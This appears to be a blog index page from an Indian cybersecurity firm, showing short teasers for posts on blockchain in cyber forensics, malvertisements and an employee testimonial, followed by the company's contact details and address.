Blockchain Implementation in Cyber Security and Cyber Forensics

Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. The blockchain contains a list of records or blocks which are linked using

Read More
September 10, 2020
Malvertisements

Malvertisements are a malicious advertisement distributed in the same was as a legitimate online advertisement. It is one of the common practices to use spread malware.

Read More
August 10, 2020
Employee Testimonial: Anamika Patil

CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor and to be mentored to achieve our client’s goals.

Read More
CyRAACS-Logos-With-White-Text
Transform your business and manage risk with your trusted cyber security partner
Business Enquiry
[email protected]
+91 8553004777
Career Opportunities
[email protected]
+91 9606019227
Social
CYRAAC Services Private Limited
3rd floor, 22, Gopalan Innovation Mall, Bannerghatta Main Road, JP Nagar Phase 3, Bengaluru, Karnataka-560076
Company CIN: U74999KA2017PTC104449
In Case Of Any Grievances Or Queries Please Contact -
Murari Shanker (MS) Co-Founder and CTO
Email ID: [email protected]
Contact number: +918553004777
© COPYRIGHT 2024, ALL RIGHTS RESERVED
crossmenu linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram